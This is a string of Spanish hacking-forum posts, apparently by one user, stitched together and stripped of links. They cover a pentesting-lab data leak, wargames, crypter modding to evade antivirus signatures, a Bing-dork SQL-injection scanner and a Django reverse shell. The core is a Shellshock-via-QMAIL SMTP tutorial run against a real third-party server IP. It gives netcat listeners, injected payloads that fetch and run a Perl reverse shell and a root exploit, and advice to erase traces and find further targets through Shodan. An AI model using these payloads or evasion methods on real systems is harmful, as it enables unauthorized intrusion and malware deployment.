Ayer me llego una interesante noticia donde un puñado de hackers vulneraron el sistema principal del ya muy conocido laboratorio virtual de pentesting You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login donde muchos interesados del tema estábamos registrados.

En fin, el tema va en que han accedido a la db y han publicado los datos de los usuarios registrados:

Emails y nicks: (Si están en esta lista, es recomendable que cambien las contraseñas de sus cuentas y tener cuidado porq probablemente nuestros datos estén siendo usados en alguna campaña de spam)

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Comunicado oficial del sitio: (según los administradores del sitio, no se sabe si los atacantes llegaron a obtener las contraseñas)

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
como cual método o librería?

la idea es crear el código no usar una función existente.

Mira te dejo mudo... Si alguien lo resuelve en c usando punteros, no se puede replicar en ningun otro lenguaje (salvo c++ o D) ya q no existen los punteros fuera de la familia directa de c

Cita de: [Q3rV[0] link=topic=21806.msg73774#msg73774 date=1399405336]
Muy linda! pero me quedo con el bash clasico

Estoy con vos!, si te acostumbras a esa shell despues hardenizar cualquier server se te vuelve un parto...

# whoami
root

Puff!!! de lo mejor que he jugado! un wargame de puta madre! me hizo acordar a Xerxes por el nivel de dificultad!

---

Solucionario enviado!

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
JJajajaja reto y tu apareces volando!!!  no se vale si juegas tu

Yo no juego por los puntos! juego por que se ve entretenido y de hecho lo fue!!! Despues seguro publican todos los solucionarios juntos!

Ya casi termino!! Ya casi termiiiino!!!!

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si o si tiene que ser ese crypter?
Porque sino te paso un paper que todavia no he publicado sobre como hacer un crypter desde cero, y se te va a hacer mas facil moddearlo.

Saludos!
ANTRAX

Estoy armando uno en C estoy en la parte de injectar el codigo en el proceso suspendido, algo bastante enroscado, pero ademas del tema desarrollo quisiera meterme a modear, creo q son cosas distintas, el desarrollo al moding, se aprenden terminos y metodos distintos

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Tenés el Src del crypter?

No! sino ya hubiera intentado modearlo desde src

Hace unos dias me pico el bicho del malware ya que también soy programador con titulo, y he tenido mis roces con en desarrollo de malware desde 0, peeero ahora ando estudiando un poco el mundo del moding y realmente se poco y nada, logre sacar Avast con dsplit y AVfucker, y ahora estoy con AVG 2015

AVG me larga la firma "Toyano Injector.BLB" y acorrale la firma en la cabecera en el offset 60, en el byte 8B, pero modificar el offset me rompe el binario, intente con rit, pero hasta donde entiendo no puedo hacer rit sobre la cabecera y de todas formas al intentarlo y llevar la funcion a una sección NOP, de todas formas rompe el binario

Offset 60:

Instrucciones en el Offset 60:


PD: Estoy modeando ACrypter de la sección malware database

Huee!! hace mucho q no veía algo así, muy bueno! tendré q probarlo!

Solucion enviada!

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gran tutorial, hdbreaker, te puse +1, me ha encantado

jajja gracias!

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muy buen aporte! Excelente PoC de una vulnerabilidad muy jodida! Ojala mas usuarios le dieran la importancia que tiene, pero bueh. Genial el post 

Gracias a vos loquin! vos me hiciste ver por encima de la pared!

Parece que borraron el botón de responder...

Bueno antes que nada le agradezco a hielasangre por sacarme el bloqueo

Como he leido mucho de shellshock y nada sobre como explotarlo, les dejo un pequeño tutorial de como explotarlo un poco más allá que en los clasicos user-agent (que siendo realista muy pocos servidores utlizán cgi-scripts y menos hechos en bash)

Esto afecta a los servidores smtp de QMAIL por no validar correctamente el encabezado FROM MAIL:<> permitiendo ingresar como email cualquier string,
nosotros aprovecharemos esto para lograr ejecutar nuestro codigo arbitrario con la ayuda de shellshock

Para el PoC use este servidor que encontre vulnerable: 200.80.35.42

Empezamos!

1) Dejamos a la escucha el puerto donde queremos recibir la conexión entrante:

nc -vv -l -p 9669



2) Nos conectamos al servidor smtp y realizamos el ataque

nc -vv 200.80.35.42 25

Entablamos toda la negociación necesaria con el servidor SMTP, esto consta de 4 pasos

.helo me (Le comunicamos al servidor que necesitamos usar su servicio)
.mail from:<[email protected]> (establecemos la dirección de email remitente) ---> ACÁ INYECTAMOS NUESTRO CODIGO SHELLSHOCK
rcpt to: <> ([email protected]) (establecemos la direccion del receptor del mensaje)
data (Comenzamos a escribir el email)
Subject: Titulo. (Establecemos el titulo del mensaje y lo terminamos con un .)
Mensaje. (Escribimos el mensaje terminado con un .)

FIN (Esperamos que se complete el proceso)

(Para mas info de SMTP visitar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login )

Bueno como mas arriba dije el error radica en que QMAIL no valida que lo ingresado en MAIL FROM sea un email
entonces en mi caso inyecto el siguiente payload shellshock:

() { :;}; /usr/bin/telnet You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login 9669

Al terminar el proceso de QMAIL deberia ejecutar el codigo arbitrario inyectado en la variable global de la función de shellshock y devolvernos una conexion entrante a nuestro puerto a la escucha



Esto significa q con un poco de conocimiento hemos logrado ejecutar codigo arbitrario en el servidor mediante un servidor vulnerable explotando un error de validación de SMTP, en este simple PoC me devolví una conexión telnet, pero podriamos jugar con los comandos para subir un reverse shell y ganar acceso al sistema, veamos como!

Esta vez vamos a ejecutar codigo arbitrario para descargarnos de nuestro servidor web un reverse shell en perl

Payload:

() { :;}; /usr/bin/wget You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login:8080/rsh.perl



esperamos un tiempo considerable para asegurarnos la descarga de nuestro script, ponemos a escuchar nuevamente nc



y ejecutamos nuestro archivo perl

() { :;}; /usr/bin/perl rsh.perl You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login 9669 -l



y ahora tenemos acceso al sistema! JA! si indagamos un poco y largamos un whoami! vemos que es un kernel 2.6



Intentemos rootearlo, yo en mi caso use un AutoRoot en perl que encontre por internet.

wget You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login:8081/AutoRoot.pl



Pasemos a ver si tenemos suerte!

Ejecutamos los You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y vemos q sucede (yo en mi caso moví ambos archivos a otra carpeta)

perl You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y esperamos!

En este caso no hemos tenido suerte, lo que no descarta que buscando un poco podamos hacer un rooteo manual del servidor (De hecho ya lo hice)
pero eso quedara para otro tutorial! (Estoy haciendo el tutorial mientras realizo la intrusión)



No nos olvidemos de borrar todas nuestras huellas!

Y despues de esto preguntaran, cuantos sitios vulnerables a shellshock existen, bueno yo me ayude un poco de mi amigo SHODAN



35500 posibles target vulnerables solo por QMAIL SMTP!!! Saludos

Happy Haking[/color]

Bueno hace mucho vi uno parecido en php, y con un poco de tiempo arme el mio en python, funciona con bing dorks. Espero les sirva.

El script tiene 5 keys de bing, estaria bueno q se armaran varias uds para alimentar el modo random key porq cada key permite 5000 peticiones por dia.



Guarda un logs con los sitios potencialmente vulnerables, se puede ver haciendo:

"python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login --vulnerable" o desde el archivo vulnerable.txt ----> con este archivo se puede vincular a sqlmap y hacer auditorias totalmente automatizadas

Es un proyecto abandonado OpenSource asi que el que quiera retomarlo bienvenido sea, con un poco de maña y expresiones regulares se pueden agregar miles de vectores de inyección y hasta vincular la app con sqlmap, cualquiera que quiera seguir con el proyecto que me mande un MP si necesita ayuda

EDIT: me había olvidado del link
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Capturas:

Funcionando:


Vulnerables encontrados en mis tiempos libres:

Bueno hace mucho q no me paso por acá, pero hace unos días me toco auditar un servidor Django, y entre esas cosas de la vida, me decidí a armar un reverse shell en Django dado al poco contenido de pentesting en servidores python, les dejo el aporte.

Para ejecutarlo es necesario tener Django instalado:
(La shell es multithreading puede servir shell a infinita cantidad de PCs/Puertos)

pip install Django

Despues nos vamos a la carpeta y ejecutamos un "python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login runserver ip:port"

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Recién leo esto, lo que dices tu esta mal!!! un ataque DoS /DDoS por TCP y teniendo en cuenta algún sistema de protección por parte del Sysadmin, lo que hace es detectar y bloquear las ip que realizan el ataque, entonces sus paquetes son rechazados y el servidor deja de perder tiempo de procesador al no responderlos. Y tu ip obviamente al estar bloqueada deja de poder conectarse al sitio

Gracias a todos muchachos! he ando algo ocupado! cuando pueda subo una herramienta que estoy desarrollado

forwardeaste los puertos? te aseguraste q el server donde entraste no tenga un firewall q bloquee las salidas a direcciones q no sean confiables?